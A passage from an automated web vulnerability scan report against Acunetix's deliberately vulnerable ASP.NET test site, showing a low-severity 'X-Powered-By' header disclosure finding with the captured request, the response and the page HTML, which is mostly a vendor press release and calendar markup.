15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        15. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:19 GMT
          Content-Length: 22687
          
          
          Response body (22687 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyY2RkZPOqH8VRVGFvH0VwpHODsgDXKZTi" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKP1p3RBAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/M3rUCxcfpdy3AdSqGMGh3aLpuYg==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 